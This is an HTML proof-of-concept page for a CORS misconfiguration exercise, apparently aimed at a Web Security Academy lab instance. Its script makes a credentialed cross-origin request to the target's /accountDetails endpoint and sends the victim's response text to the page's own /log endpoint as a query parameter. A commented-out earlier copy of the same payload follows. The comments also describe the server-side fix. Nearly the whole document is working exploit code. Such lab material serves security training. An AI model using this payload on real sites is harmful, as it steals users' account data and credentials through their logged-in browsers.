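<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>CORS PoC</title>
</head>
<body>
  <!--
    Proof-of-concept page for a CORS misconfiguration exercise. The target host
    looks like a Web Security Academy lab instance (inferred from its hostname).

    The cross-origin read below only succeeds if the target answers with an
    Access-Control-Allow-Origin header matching this page's origin together with
    Access-Control-Allow-Credentials: true. A server that checks Origin against
    a fixed allowlist, and never echoes arbitrary origins on credentialed
    endpoints, causes the browser to block the read.
  -->
  <h1>CORS PoC</h1>
  <div id="demo">
    <button type="button" id="run-poc">Exploit</button>
  </div>
  <script>
    /**
     * Sends a credentialed GET to the lab's /accountDetails endpoint and, once
     * the response has loaded, navigates this page to /log with the response
     * text in the `key` query parameter.
     */
    function cors() {
      var req = new XMLHttpRequest();
      req.onload = reqListener;
      // The URL needs an explicit scheme: without one the browser resolves the
      // string as a path relative to this page, so the request never leaves the
      // hosting origin and the demo exercises no CORS check at all.
      // Assumes the lab is served over HTTPS.
      req.open('get', 'https://0a5d001f0467d4e7c0ac2d6e00a30076.web-security-academy.net/accountDetails', true);
      // Ask the browser to attach the target origin's cookies to the request.
      req.withCredentials = true;
      req.send();

      // Invoked with `this` bound to the XMLHttpRequest once loading finishes.
      function reqListener() {
        location = '/log?key=' + this.responseText;
      }
    }

    // Bind the handler in script rather than with an inline onclick attribute,
    // which keeps the markup declarative.
    document.getElementById('run-poc').addEventListener('click', cors);
  </script>
</body>
</html>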
<!-- <script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','0a5d001f0467d4e7c0ac2d6e00a30076.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script> -->